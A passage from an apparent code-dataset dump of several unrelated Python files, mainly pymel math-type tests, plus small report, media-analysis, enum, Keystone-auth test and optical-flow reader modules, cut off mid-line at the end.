repr(axis(Point.origin, p, q))\n # Vector([-0.0, 0.707, 0.0])\n print repr(Point.origin.axis(p, q))\n # Vector([-0.0, 0.707, 0.0])\n print repr(Point.origin.axis(q, p))\n # Vector([0.0, -0.707, 0.0])\n print angle(Point.origin, p, q)\n # 0.785398163397\n print angle(Point.origin, q, p)\n # 0.785398163397\n print Point.origin.angle(p, q)\n # 0.785398163397\n print p.distanceTo(q)\n # 0.765309087885\n print (q - p).length()\n # 0.765309087885\n print cotan(Point.origin, p, q)\n # 1.0\n # obviously True\n print planar(Point.origin, p, q)\n # True\n r = center(Point.origin, p, q)\n print repr(r)\n # Point([0.569, 0.0, -0.235666666667, 1.0])\n print planar(Point.origin, p, q, r)\n # True\n print planar(Point.origin, p, q, r + Vector(0.0, 0.1, 0.0))\n # False\n print bWeights(r, Point.origin, p, q)\n # (0.33333333333333337, 0.33333333333333331, 0.33333333333333343)\n\n p = Point([0.33333, 0.66666, 1.333333, 0.33333])\n print repr(round(p, 3))\n # Point([0.333, 0.667, 1.333, 0.333])\n\n print \"end tests Point\"\n\ndef _testMColor():\n\n print \"Color class\", dir(Color)\n print hasattr(Color, 'data')\n c = Color()\n print repr(c)\n # Color([0.0, 0.0, 0.0, 1.0])\n print \"Color instance\", dir(c)\n print hasattr(c, 'data')\n print repr(c.data)\n # Color([0.0, 0.0, 0.0, 1.0])\n c = Color(_api.MColor())\n print repr(c)\n # Color([0.0, 0.0, 0.0, 1.0])\n # using api convetion of single value would mean alpha\n # instead of VectorN convention of filling all with value\n # which would yield # Color([0.5, 0.5, 0.5, 0.5]) instead\n # This would break coerce behavior for Color\n print \"c = Color(0.5)\"\n c = Color(0.5)\n print repr(c)\n # Color([0.5, 0.5, 0.5, 0.5])\n print \"c = round(Color(128, quantize=255), 2)\"\n c = Color(128, quantize=255)\n print 
repr(c)\n # Color([0.501999974251, 0.501999974251, 0.501999974251, 0.501999974251])\n c = Color(255, 128, b=64, a=32, quantize=255)\n print repr(c)\n # Color([1.0 0.501999974251 0.250999987125 0.125490196078])\n\n print \"c = Color(1, 1, 1)\"\n c = Color(1, 1, 1)\n print repr(c)\n # Color([1.0, 1.0, 1.0, 1.0])\n print \"c = round(Color(255, 0, 255, g=128, quantize=255, mode='rgb'), 2)\"\n c = round(Color(255, 0, 255, g=128, quantize=255, mode='rgb'), 2)\n print repr(c)\n # Color([1.0, 0.5, 1.0, 1.0])\n\n print \"c = round(Color(255, b=128, quantize=255, mode='rgb'), 2)\"\n c = round(Color(255, b=128, quantize=255, mode='rgb'), 2)\n print repr(c)\n # Color([1.0, 1.0, 0.5, 1.0])\n print \"c = Color(1, 0.5, 2, 0.5)\"\n c = Color(1, 0.5, 2, 0.5)\n print repr(c)\n # Color([1.0, 0.5, 2.0, 0.5])\n print \"c = Color(0, 65535, 65535, quantize=65535, mode='hsv')\"\n c = Color(0, 65535, 65535, quantize=65535, mode='hsv')\n print repr(c)\n # Color([1.0, 0.0, 0.0, 1.0])\n print \"c.rgb\"\n print repr(c.rgb)\n # (1.0, 0.0, 0.0)\n print \"c.hsv\"\n print repr(c.hsv)\n # (0.0, 1.0, 1.0)\n d = Color(c, v=0.5, mode='hsv')\n print repr(d)\n # Color([0.5, 0.0, 0.0, 1.0])\n print repr(d.hsv)\n # (0.0, 1.0, 0.5)\n print \"c = Color(Color.blue, v=0.5)\"\n c = Color(Color.blue, v=0.5)\n print repr(c)\n # Color([0.0, 0.0, 0.5, 1.0])\n print \"c.hsv\"\n print c.hsv\n # (0.66666666666666663, 1.0, 0.5)\n c.r = 1.0\n print repr(c)\n # Color([1.0, 0.0, 0.5, 1.0])\n print \"c.hsv\"\n print c.hsv\n # (0.91666666666666663, 1.0, 1.0)\n\n print \"c = Color(1, 0.5, 2, 0.5).clamp()\"\n c = Color(1, 0.5, 2, 0.5).clamp()\n print repr(c)\n # Color([1.0, 0.5, 1.0, 0.5])\n print c.hsv\n # (0.83333333333333337, 0.5, 1.0)\n\n print \"Color(c, v=0.5)\"\n d = Color(c, v=0.5)\n print repr(d)\n # Color([0.5, 0.25, 0.5, 0.5])\n print \"d.hsv\"\n print d.hsv\n # (0.83333333333333337, 0.5, 0.5)\n\n print \"c = Color(0.0, 0.5, 1.0, 0.5)\"\n c = Color(0.0, 0.5, 1.0, 0.5)\n print repr(c)\n # Color(0.0, 0.5, 1.0, 0.5)\n print \"d = c.gamma(2.0)\"\n d = c.gamma(2.0)\n print repr(d)\n # Color([0.0, 0.25, 1.0, 0.5])\n\n print \"c = Color.red.blend(Color.blue, 0.5)\"\n c = Color.red.blend(Color.blue, 0.5)\n print repr(c)\n # Color([0.5, 0.0, 0.5, 1.0])\n print c.hsv\n # (0.83333333333333337, 1.0, 0.5)\n c = Color.red.hsvblend(Color.blue, 0.5)\n print repr(c)\n # Color([1.0, 0.0, 1.0, 1.0])\n print c.hsv\n # (0.83333333333333337, 1.0, 1.0)\n\n print \"c = Color(0.25, 0.5, 0.75, 0.5)\"\n c = Color(0.25, 0.5, 0.75, 0.5)\n print repr(c)\n # Color([0.25, 0.5, 0.75, 0.5])\n print \"d = Color.black\"\n d = Color.black\n print repr(d)\n # Color([0.0, 0.0, 0.0, 1.0])\n print \"c.over(d)\"\n print repr(c.over(d))\n # Color([0.125, 0.25, 0.375, 1.0])\n print \"d.over(c)\"\n print repr(d.over(c))\n # Color([0.0, 0.0, 0.0, 0.5])\n print \"c.premult()\"\n print repr(c.premult())\n # Color([0.125, 0.25, 0.375, 1.0])\n\n # herited from Vector\n\n print \"c = Color(0.25, 0.5, 1.0, 1.0)\"\n c = Color(0.25, 0.5, 1.0, 1.0)\n print repr(c)\n # Color([0.25, 0.5, 1.0, 1.0])\n print \"d = Color(2.0, 1.0, 0.5, 0.25)\"\n d = Color(2.0, 1.0, 0.5, 0.25)\n print repr(d)\n # Color([2.0, 1.0, 0.5, 0.25])\n print \"-c\"\n print repr(-c)\n # Color([-0.25, -0.5, -1.0, 1.0])\n print \"e = c*d\"\n e = c * d\n print repr(e)\n # Color([0.5, 0.5, 0.5, 0.25])\n print \"e + 2\"\n print repr(e + 2)\n # Color([2.5, 2.5, 2.5, 0.25])\n print \"e * 2.0\" # mult by scalar float is defined in api for colors and also multiplies alpha\n print repr(e * 2.0)\n # Color([1.0, 1.0, 1.0, 0.5])\n print 
\"e / 2.0\" # as is divide, that ignores alpha now for some reason\n print repr(e / 2.0)\n # Color([0.25, 0.25, 0.25, 0.25])\n print \"e+Vector(1, 2, 3)\"\n print repr(e + Vector(1, 2, 3))\n # Color([1.5, 2.5, 3.5, 0.25])\n # how to handle operations on colors ?\n # here behaves like api but does it make any sense\n # for colors as it is now ?\n print \"c+c\"\n print repr(c + c)\n # Color([0.5, 1.0, 2.0, 1.0])\n print \"c+d\"\n print repr(c + d)\n # Color([2.25, 1.5, 1.5, 1.0])\n print \"d-c\"\n print repr(d - c)\n # Color([1.75, 0.5, -0.5, 0.25])\n\n print \"end tests Color\"\n\ndef _testMMatrix():\n\n print \"Matrix class\", dir(Matrix)\n m = Matrix()\n print m.formated()\n #[[1.0, 0.0, 0.0, 0.0],\n # [0.0, 1.0, 0.0, 0.0],\n # [0.0, 0.0, 1.0, 0.0],\n # [0.0, 0.0, 0.0, 1.0]]\n print m[0, 0]\n # 1.0\n print repr(m[0:2, 0:3])\n # [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]]\n print m(0, 0)\n # 1.0\n print \"Matrix instance:\", dir(m)\n print Matrix.__readonly__\n print Matrix.__slots__\n print Matrix.shape\n print Matrix.ndim\n print Matrix.size\n print m.shape\n print m.ndim\n print m.size\n # should fail\n m.shape = (4, 4)\n m.shape = 2\n\n print dir(Space)\n\n m = Matrix.identity\n # inherits from MatrixN --> Array\n print isinstance(m, MatrixN)\n # True\n print isinstance(m, Array)\n # True\n # as well as _api.Matrix\n print isinstance(m, _api.MMatrix)\n # True\n # accepted directly by API methods\n n = _api.MMatrix()\n m = n.setToProduct(m, m)\n print repr(m)\n print repr(n)\n\n # inits\n m = Matrix(range(16))\n print m.formated()\n #[[0.0, 1.0, 2.0, 3.0],\n # [4.0, 5.0, 6.0, 7.0],\n # [8.0, 9.0, 10.0, 11.0],\n # [12.0, 13.0, 14.0, 15.0]]\n M = Array(range(16), shape=(8, 2))\n m = Matrix(M)\n print m.formated()\n #[[0.0, 1.0, 2.0, 3.0],\n # [4.0, 5.0, 6.0, 7.0],\n # [8.0, 9.0, 10.0, 11.0],\n # [12.0, 13.0, 14.0, 15.0]]\n M = MatrixN(range(9), shape=(3, 3))\n m = Matrix(M)\n print m.formated()\n #[[0.0, 1.0, 2.0, 0.0],\n # [3.0, 4.0, 5.0, 0.0],\n # [6.0, 7.0, 8.0, 0.0],\n # [0.0, 0.0, 0.0, 1.0]]\n # inherits from MatrixN --> Array\n print isinstance(m, MatrixN)\n # True\n print isinstance(m, Array)\n # True\n # as well as _api.Matrix\n print isinstance(m, _api.MMatrix)\n # True\n # accepted directly by API methods\n n = _api.MMatrix()\n m = n.setToProduct(m, m)\n print repr(m)\n print repr(n)\n t = _api.MTransformationMatrix()\n t.setTranslation(Vector(1, 2, 3), _api.MSpace.kWorld)\n m = Matrix(t)\n print m.formated()\n #[[1.0, 0.0, 0.0, 0.0],\n # [0.0, 1.0, 0.0, 0.0],\n # [0.0, 0.0, 1.0, 0.0],\n # [1.0, 2.0, 3.0, 1.0]]\n m = Matrix(m, a30=10)\n print m.formated()\n #[[1.0, 0.0, 0.0, 0.0],\n # [0.0, 1.0, 0.0, 0.0],\n # [0.0, 0.0, 1.0, 0.0],\n # [10.0, 2.0, 3.0, 1.0]]\n # should fail\n print \"Matrix(range(20)\"\n try:\n m = Matrix(range(20))\n print m.formated()\n except:\n print \"will raise ValueError: cannot initialize a Matrix of shape (4, 4) from (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19), some information would be lost, use an explicit resize or trim\"\n\n m = Matrix.identity\n M = m.trimmed(shape=(3, 3))\n print repr(M)\n # MatrixN([[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]])\n print M.formated()\n #[[1.0, 0.0, 0.0],\n # [0.0, 1.0, 0.0],\n # [0.0, 0.0, 1.0]]\n try:\n m.trim(shape=(3, 3))\n except:\n print \"will raise TypeError: new shape (3, 3) is not compatible with class Matrix\"\n\n print m.nrow\n # 4\n print m.ncol\n # 4\n # should fail\n try:\n m.nrow = 3\n except:\n print \"will raise TypeError: new shape (3, 4) is not compatible with class 
Matrix\"\n print list(m.row)\n # [Array([1.0, 0.0, 0.0, 0.0]), Array([0.0, 1.0, 0.0, 0.0]), Array([0.0, 0.0, 1.0, 0.0]), Array([0.0, 0.0, 0.0, 1.0])]\n print list(m.col)\n # [Array([1.0, 0.0, 0.0, 0.0]), Array([0.0, 1.0, 0.0, 0.0]), Array([0.0, 0.0, 1.0, 0.0]), Array([0.0, 0.0, 0.0, 1.0])]\n\n m = Matrix(MatrixN(range(9), shape=(3, 3)).trimmed(shape=(4, 4), value=10))\n print m.formated()\n #[[0.0, 1.0, 2.0, 10.0],\n # [3.0, 4.0, 5.0, 10.0],\n # [6.0, 7.0, 8.0, 10.0],\n # [10.0, 10.0, 10.0, 10.0]]\n\n print m.get()\n # ((0.0, 1.0, 2.0, 10.0), (3.0, 4.0, 5.0, 10.0), (6.0, 7.0, 8.0, 10.0), (10.0, 10.0, 10.0, 10.0))\n print repr(m[0])\n # [0.0, 1.0, 2.0, 10.0]\n m[0] = 10\n print m.formated()\n #[[10.0, 10.0, 10.0, 10.0],\n # [3.0, 4.0, 5.0, 10.0],\n # [6.0, 7.0, 8.0, 10.0],\n # [10.0, 10.0, 10.0, 10.0]]\n print (10 in m)\n # True\n print list(m)\n # [Array([10.0, 10.0, 10.0, 10.0]), Array([3.0, 4.0, 5.0, 10.0]), Array([6.0, 7.0, 8.0, 10.0]), Array([10.0, 10.0, 10.0, 10.0])]\n print list(m.flat)\n # [10.0, 10.0, 10.0, 10.0, 3.0, 4.0, 5.0, 10.0, 6.0, 7.0, 8.0, 10.0, 10.0, 10.0, 10.0, 10.0]\n\n u = Vector.xAxis\n v = Vector.yAxis\n print Vector.xAxis\n print str(Vector.xAxis)\n print unicode(Vector.xAxis)\n print repr(Vector.xAxis)\n\n print \"u = Vector.xAxis:\"\n print repr(u)\n\n # trans matrix : t: 1, 2, 3, r: 45, 90, 30, s: 0.5, 1.0, 2.0\n m = Matrix([0.0, 4.1633363423443383e-17, -0.5, 0.0, 0.25881904510252079, 0.96592582628906831, 1.3877787807814459e-16, 0.0, 1.9318516525781366, -0.51763809020504159, 0.0, 0.0, 1.0, 2.0, 3.0, 1.0])\n print \"m:\"\n print round(m, 2).formated()\n #[[0.0, 0.0, -0.5, 0.0],\n # [0.26, 0.97, 0.0, 0.0],\n # [1.93, -0.52, 0.0, 0.0],\n # [1.0, 2.0, 3.0, 1.0]]\n\n x = Vector.xAxis\n y = Vector.yAxis\n z = Vector.zAxis\n u = Vector(1, 2, 3)\n print \"u:\"\n print repr(u)\n # Vector([1, 2, 3])\n print \"u*m\"\n print repr(u * m)\n # Vector([6.31319304794, 0.378937381963, -0.5])\n print \"m*u\"\n print repr(m * u)\n # Vector([-1.5, 2.19067069768, 0.896575472168])\n\n p = Point(1, 10, 100, 1)\n print \"p:\"\n print repr(p)\n # Point([1.0, 10.0, 100.0, 1.0])\n print \"p*m\"\n print repr(p * m)\n # Point([196.773355709, -40.1045507576, 2.5, 1.0])\n print \"m*p\"\n print repr(m * p)\n # Point([-50.0, 9.91807730799, -3.24452924947, 322.0])\n\n print \"v = [1, 2, 3]*m\"\n v = VectorN([1, 2, 3]) * m\n print repr(v)\n # VectorN([6.31319304794, 0.378937381963, -0.5])\n print \"v = [1, 2, 3, 1]*m\"\n v = VectorN([1, 2, 3, 1]) * m\n print repr(v)\n # VectorN([7.31319304794, 2.37893738196, 2.5, 1.0])\n # should fail\n print \"VectorN([1, 2, 3, 4, 5])*m\"\n try:\n v = VectorN([1, 2, 3, 4, 5]) * m\n except:\n print \"Will raise ValueError: vector of size 5 and matrix of shape (4, 4) are not conformable for a VectorN * MatrixN multiplication\"\n\n # herited\n\n print \"m = Matrix(range(1, 17))\"\n m = Matrix(range(1, 17))\n print m.formated()\n #[[1.0, 2.0, 3.0, 4.0],\n # [5.0, 6.0, 7.0, 8.0],\n # [9.0, 10.0, 11.0, 12.0],\n # [13.0, 14.0, 15.0, 16.0]]\n # element wise\n print \"[1, 10, 100]*m\"\n print repr([1, 10, 100] * m)\n # Matrix([[1.0, 20.0, 300.0, 0.0], [5.0, 60.0, 700.0, 0.0], [9.0, 100.0, 1100.0, 0.0], [13.0, 140.0, 1500.0, 0.0]])\n print \"M = MatrixN(range(20), shape=(4, 5))\"\n M = MatrixN(range(1, 21), shape=(4, 5))\n print M.formated()\n #[[1, 2, 3, 4, 5],\n # [6, 7, 8, 9, 10],\n # [11, 12, 13, 14, 15],\n # [16, 17, 18, 19, 20]]\n print \"m*M\"\n n = m * M\n print (n).formated()\n #[[110.0, 120.0, 130.0, 140.0, 150.0],\n # [246.0, 272.0, 298.0, 324.0, 350.0],\n # 
[382.0, 424.0, 466.0, 508.0, 550.0],\n # [518.0, 576.0, 634.0, 692.0, 750.0]]\n print util.clsname(n)\n # MatrixN\n print \"m*2\"\n n = m * 2\n print (n).formated()\n #[[2.0, 4.0, 6.0, 8.0],\n # [10.0, 12.0, 14.0, 16.0],\n # [18.0, 20.0, 22.0, 24.0],\n # [26.0, 28.0, 30.0, 32.0]]\n print util.clsname(n)\n # Matrix\n print \"2*m\"\n n = 2 * m\n print (n).formated()\n #[[2.0, 4.0, 6.0, 8.0],\n # [10.0, 12.0, 14.0, 16.0],\n # [18.0, 20.0, 22.0, 24.0],\n # [26.0, 28.0, 30.0, 32.0]]\n print util.clsname(n)\n # Matrix\n print \"m+2\"\n n = m + 2\n print (n).formated()\n #[[3.0, 4.0, 5.0, 6.0],\n # [7.0, 8.0, 9.0, 10.0],\n # [11.0, 12.0, 13.0, 14.0],\n # [15.0, 16.0, 17.0, 18.0]]\n print util.clsname(n)\n # Matrix\n print \"2+m\"\n n = 2 + m\n print (n).formated()\n #[[3.0, 4.0, 5.0, 6.0],\n # [7.0, 8.0, 9.0, 10.0],\n # [11.0, 12.0, 13.0, 14.0],\n # [15.0, 16.0, 17.0, 18.0]]\n print util.clsname(n)\n # Matrix\n try:\n m.setToProduct(m, M)\n except:\n print \"\"\"Will raise TypeError: cannot initialize a Matrix of shape (4, 4) from (Array([0, 1, 2, 3, 4]), Array([5, 6, 7, 8, 9]), Array([10, 11, 12, 13, 14]), Array([15, 16, 17, 18, 19])) of shape (4, 5),\n as it would truncate data or reduce the number of dimensions\"\"\"\n\n print m.isEquivalent(m * M)\n # False\n\n # trans matrix : t: 1, 2, 3, r: 45, 90, 30, s: 0.5, 1.0, 2.0\n m = Matrix([0.0, 4.1633363423443383e-17, -0.5, 0.0, 0.25881904510252079, 0.96592582628906831, 1.3877787807814459e-16, 0.0, 1.9318516525781366, -0.51763809020504159, 0.0, 0.0, 1.0, 2.0, 3.0, 1.0])\n print \"m:\"\n print round(m, 2).formated()\n #[[0.0, 0.0, -0.5, 0.0],\n # [0.26, 0.97, 0.0, 0.0],\n # [1.93, -0.52, 0.0, 0.0],\n # [1.0, 2.0, 3.0, 1.0]]\n print \"m.transpose():\"\n print round(m.transpose(), 2).formated()\n #[[0.0, 0.26, 1.93, 1.0],\n # [0.0, 0.97, -0.52, 2.0],\n # [-0.5, 0.0, 0.0, 3.0],\n # [0.0, 0.0, 0.0, 1.0]]\n print \"m.isSingular():\"\n print m.isSingular()\n # False\n print \"m.inverse():\"\n print round(m.inverse(), 2).formated()\n #[[0.0, 0.26, 0.48, 0.0],\n # [0.0, 0.97, -0.13, 0.0],\n # [-2.0, 0.0, 0.0, 0.0],\n # [6.0, -2.19, -0.22, 1.0]]\n print \"m.adjoint():\"\n print round(m.adjoint(), 2).formated()\n #[[0.0, 0.26, 0.48, 0.0],\n # [0.0, 0.97, -0.13, 0.0],\n # [-2.0, 0.0, -0.0, 0.0],\n # [6.0, -2.19, -0.22, 1.0]]\n print \"m.adjugate():\"\n print round(m.adjugate(), 2).formated()\n #[[0.0, 0.26, 0.48, 0.0],\n # [0.0, 0.97, -0.13, 0.0],\n # [-2.0, 0.0, -0.0, 0.0],\n # [6.0, -2.19, -0.22, 1.0]]\n print \"m.homogenize():\"\n print round(m.homogenize(), 2).formated()\n #[[0.0, 0.0, -1.0, 0.0],\n # [0.26, 0.97, 0.0, 0.0],\n # [0.97, -0.26, -0.0, 0.0],\n # [1.0, 2.0, 3.0, 1.0]]\n print \"m.det():\"\n print m.det()\n # 1.0\n print \"m.det4x4():\"\n print m.det4x4()\n # 1.0\n print \"m.det3x3():\"\n print m.det3x3()\n # 1.0\n print \"m.weighted(0.5):\"\n print round(m.weighted(0.5), 2).formated()\n #[[0.53, 0.0, -0.53, 0.0],\n # [0.09, 0.99, 0.09, 0.0],\n # [1.05, -0.2, 1.05, 0.0],\n # [0.5, 1.0, 1.5, 1.0]]\n print \"m.blend(Matrix.identity, 0.5):\"\n print round(m.blend(Matrix.identity, 0.5), 2).formated()\n #[[0.53, 0.0, -0.53, 0.0],\n # [0.09, 0.99, 0.09, 0.0],\n # [1.05, -0.2, 1.05, 0.0],\n # [0.5, 1.0, 1.5, 1.0]]\n\n print \"end tests Matrix\"\n\ndef _testMTransformationMatrix():\n\n q = Quaternion()\n print repr(q)\n # Quaternion([0.0, 0.0, 0.0, 1.0])\n q = Quaternion(1, 2, 3, 0.5)\n print repr(q)\n # Quaternion([1.0, 2.0, 3.0, 0.5])\n q = Quaternion(0.785, 0.785, 0.785, \"xyz\")\n print repr(q)\n # Quaternion([0.191357439088, 0.461717715523, 
0.191357439088, 0.844737481223])\n\n m = Matrix()\n m.rotate = q\n print repr(m)\n # Matrix([[0.500398163355, 0.499999841466, -0.706825181105, 0.0], [-0.146587362969, 0.853529322022, 0.499999841466, 0.0], [0.853295859083, -0.146587362969, 0.500398163355, 0.0], [0.0, 0.0, 0.0, 1.0]])\n\n print \"TransformationMatrix class\", dir(TransformationMatrix)\n m = TransformationMatrix()\n print m.formated()\n #[[1.0, 0.0, 0.0, 0.0],\n # [0.0, 1.0, 0.0, 0.0],\n # [0.0, 0.0, 1.0, 0.0],\n # [0.0, 0.0, 0.0, 1.0]]\n print m[0, 0]\n # 1.0\n print m[0:2, 0:3]\n # [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]]\n print \"TransformationMatrix instance:\", dir(m)\n print TransformationMatrix.__readonly__\n print TransformationMatrix.__slots__\n print TransformationMatrix.shape\n print TransformationMatrix.ndim\n print TransformationMatrix.size\n print m.shape\n print m.ndim\n print m.size\n # should fail\n m.shape = (4, 4)\n m.shape = 2\n\n print dir(Space)\n\n m = TransformationMatrix.identity\n # inherits from MatrixN --> Array\n print isinstance(m, MatrixN)\n # True\n print isinstance(m, Array)\n # True\n # as well as _api.TransformationMatrix and _api.Matrix\n print isinstance(m, _api.MTransformationMatrix)\n # True\n print isinstance(m, _api.MMatrix)\n # True\n\n # accepted directly by API methods\n n = _api.MMatrix()\n n = n.setToProduct(m, m)\n print repr(n)\n\n n = _api.MTransformationMatrix()\n n = n.assign(m)\n print repr(n)\n\n m = TransformationMatrix.identity\n m.rotation = Quaternion()\n print repr(m)\n print m.formated()\n\n n = TransformationMatrix.identity\n n.translation = Vector(1, 2, 3)\n print n.formated()\n print repr(n)\n\n o = m * n\n print repr(o)\n print o.formated()\n\n print \"end tests TransformationMatrix\"\n\nif __name__ == '__main__':\n print Distance.getInternalUnit()\n # centimeters\n print Distance.getUIUnit()\n # centimeters\n Distance.setUIUnit('meters')\n print Distance.getUIUnit()\n # meters\n d = Distance(12)\n print d.unit\n # meters\n print d\n 1200.0\n print repr(d)\n Distance(12.0, unit='meters')\n print d.asUnit()\n 12.0\n print d.asInternalUnit()\n 1200.0\n\n import doctest\n doctest.testmod(verbose=True)\n\n _testMVector()\n _testMPoint()\n _testMColor()\n _testMMatrix()\n _testMTransformationMatrix()\n"} {"ext": "py", "sha": "1a301ff37e88e50ec5a25135e53b40398b1416e6", "content": "# report_tests.py\nimport unittest\nimport reporting as report\nfrom unittest.mock import MagicMock, Mock\n\n\nclass ReportTestSolver(unittest.TestCase):\n \"\"\"[summary]\n\n Args:\n unittest ([type]): [description]\n \"\"\"\n\n def nodes_error_reporting_tests(self):\n \"\"\"[summary]\n \"\"\"\n report.nodes_error_reporting()\n\n def error_folder_created(self):\n \"\"\"[summary]\n \"\"\"\n pass\n\n def error_report_created(self):\n \"\"\"[summary]\n \"\"\"\n pass\n\n def plot_missing_data_tests(self):\n \"\"\"[summary]\n \"\"\"\n report.plot_missing_data()\n\n def list_unique_values_tests(self):\n \"\"\"[summary]\n \"\"\"\n report.list_unique_values()\n\n def print_column_info_tests(self):\n \"\"\"[summary]\n \"\"\"\n report.print_column_info()\n\n def visualise_missing_counts_tests(self):\n \"\"\"[summary]\n \"\"\"\n report.visualise_missing_counts()\n"} {"ext": "py", "sha": "1a302137155acd572965bfc0e46523be33b80e40", "content": "from .probe import Probe\nfrom .utils import most_frequent, process_dict_list, merge_dicts\n\n\"\"\"\nAnalyses a group of clips.\n\"\"\"\nclass Analysis:\n def __init__(self, clips=[]):\n self.clips = clips\n\n def summary(self):\n file_summary = []\n for clip in 
self.clips:\n summary = Probe(clip).run().extract_summary()\n file_summary.append(summary)\n \n final_list = None\n\n for item in file_summary:\n if final_list == None:\n final_list = item\n else:\n final_list = merge_dicts(final_list, item)\n\n return process_dict_list(final_list, most_frequent)\n\n "} {"ext": "py", "sha": "1a3021b2904eedd3d9e140c1608d5f065fa72de3", "content": "from enum import Enum\n\n\nclass TaskLogonTypeEnum(Enum):\n \"\"\" \"\"\"\n\n TASK_LOGON_NONE = 0\n TASK_LOGON_PASSWORD = 1\n TASK_LOGON_S4U = 2\n TASK_LOGON_INTERACTIVE_TOKEN = 3\n TASK_LOGON_GROUP = 4\n TASK_LOGON_SERVICE_ACCOUNT = 5\n TASK_LOGON_INTERACTIVE_TOKEN_OR_PASSWORD = 6\n"} {"ext": "py", "sha": "1a3021eeb8268191c79085cea1a6a5a95d56b66d", "content": "##############################################################################\n# Copyright (c) 2017 ZTE Corp and others.\n#\n# All rights reserved. This program and the accompanying materials\n# are made available under the terms of the Apache License, Version 2.0\n# which accompanies this distribution, and is available at\n# http://www.apache.org/licenses/LICENSE-2.0\n##############################################################################\nimport os\n\nimport pytest\n\nfrom deploy.post.keystoneauth import Keystoneauth\n\n\n@pytest.mark.parametrize('openrc, expected', [\n ('/etc/kolla/admin-openrc.sh', '/etc/kolla/admin-openrc.sh'),\n (None, '/etc/kolla/admin-openrc.sh')])\ndef test_create_Keystoneauth_instance(openrc, expected):\n KeystoneClient = Keystoneauth(openrc)\n assert KeystoneClient.openrc == expected\n\n\n@pytest.mark.parametrize('raws, expected', [\n (\n {\n 'OS_USERNAME': 'admin',\n 'OS_PASSWORD': 'keystone',\n 'OS_AUTH_URL': 'http://10.20.11.11:35357/v3',\n 'OS_TENANT_NAME': 'admin',\n 'OS_USER_DOMAIN_NAME': 'Default',\n 'OS_PROJECT_DOMAIN_NAME': 'Default',\n 'OS_PROJECT_NAME': 'admin',\n 'OS_INTERFACE': 'internal',\n 'OS_IDENTITY_API_VERSION': 'region_name'\n },\n {\n 'username': 'admin',\n 'password': 'keystone',\n 'auth_url': 'http://10.20.11.11:35357/v3',\n 'tenant_name': 'admin',\n 'user_domain_name': 'Default',\n 'project_domain_name': 'Default',\n 'project_name': 'admin'\n }),\n (\n {\n 'OS_USERNAME': 'admin',\n 'OS_PASSWORD': 'keystone',\n 'OS_AUTH_URL': 'http://10.20.11.11:35357/v3',\n 'OS_TENANT_NAME': 'admin',\n 'OS_USER_DOMAIN_NAME': 'Default',\n 'OS_PROJECT_DOMAIN_NAME': 'Default',\n 'OS_PROJECT_NAME': 'admin',\n 'OS_ENDPOINT_TYPE': 'Default',\n 'OS_REGION_NAME': 'Default'\n },\n {\n 'username': 'admin',\n 'password': 'keystone',\n 'auth_url': 'http://10.20.11.11:35357/v3',\n 'tenant_name': 'admin',\n 'user_domain_name': 'Default',\n 'project_domain_name': 'Default',\n 'project_name': 'admin',\n 'endpoint_type': 'Default',\n 'region_name': 'Default'\n }\n )])\ndef test__parse_credentials_in_Keystoneauth(raws, expected):\n assert Keystoneauth._parse_credentials(raws) == expected\n\n\n@pytest.fixture(scope=\"session\")\ndef openrc_conf_file_dir(data_root):\n return os.path.join(data_root, 'openrc_conf')\n\n\ndef test_session(openrc_conf_file_dir):\n openrc = os.path.join(openrc_conf_file_dir, 'admin-openrc.sh')\n KeystoneClient = Keystoneauth(openrc)\n assert KeystoneClient.session\n\n\n@pytest.mark.parametrize('openrc_file_name, expected', [\n (\n 'admin-openrc.sh',\n {\n 'OS_PROJECT_DOMAIN_NAME': 'Default',\n 'OS_USER_DOMAIN_NAME': 'Default',\n 'OS_PROJECT_NAME': 'admin',\n 'OS_TENANT_NAME': 'admin',\n 'OS_USERNAME': 'admin',\n 'OS_PASSWORD': 'keystone',\n 'OS_AUTH_URL': 'http://10.20.11.11:35357/v3',\n 'OS_INTERFACE': 
'internal',\n 'OS_IDENTITY_API_VERSION': '3'\n }\n )])\ndef test__parse_openrc(openrc_conf_file_dir, openrc_file_name, expected):\n openrc = os.path.join(openrc_conf_file_dir, openrc_file_name)\n KeystoneClient = Keystoneauth(openrc)\n ret_openrc_dict = KeystoneClient._parse_openrc()\n assert expected == ret_openrc_dict\n\n\n@pytest.mark.parametrize('openrc_file_name', [\n (\n 'admin-openrc.sh'\n )])\ndef test__get_auth(openrc_conf_file_dir, openrc_file_name,):\n openrc = os.path.join(openrc_conf_file_dir, openrc_file_name)\n KeystoneClient = Keystoneauth(openrc)\n assert KeystoneClient._get_auth()\n"} {"ext": "py", "sha": "1a3022641185cea50540e9df4b5653ac22fb94cf", "content": "import re\nfrom os.path import *\n\nimport cv2\nimport numpy as np\nimport torch.nn.functional as F\nfrom PIL import Image\n\ncv2.setNumThreads(0)\ncv2.ocl.setUseOpenCL(False)\n\nTAG_CHAR = np.array([202021.25], np.float32)\n\n\ndef read_flow_middlebury(fn):\n \"\"\"\n Read .flo file in Middlebury format\n\n Parameters\n -----------\n fn : str\n Absolute path to flow file\n\n Returns\n --------\n flow : np.ndarray\n Optical flow map\n \"\"\"\n # Code adapted from:\n # http://stackoverflow.com/questions/28013200/reading-middlebury-flow-files-with-python-bytes-array-numpy\n\n # WARNING: this will work on little-endian architectures (eg Intel x86) only!\n # print 'fn = %s'%(fn)\n with open(fn, \"rb\") as f:\n magic = np.fromfile(f, np.float32, count=1)\n if 202021.25 != magic:\n print(\"Magic number incorrect. Invalid .flo file\")\n return None\n else:\n w = np.fromfile(f, np.int32, count=1)\n h = np.fromfile(f, np.int32, count=1)\n # print 'Reading %d x %d flo file\\n' % (w, h)\n data = np.fromfile(f, np.float32, count=2 * int(w) * int(h))\n # Reshape data into 3D array (banda, columns, rows)\n return np.resize(data, (int(h), int(w), 2))\n\n\ndef read_flow_pfm(file):\n \"\"\"\n Read optical flow from a .pfm file\n\n Parameters\n -----------\n file : str\n Path to flow file\n\n Returns\n --------\n flow : np.ndarray\n Optical flow map\n \"\"\"\n\n file = open(file, \"rb\")\n\n color = None\n width = None\n height = None\n scale = None\n endian = None\n\n header = file.readline().rstrip()\n if header == b\"PF\":\n color = True\n elif header == b\"Pf\":\n color = False\n else:\n raise Exception(\"Not a PFM file.\")\n\n dim_match = re.match(rb\"^(\\d+)\\s(\\d+)\\s$\", 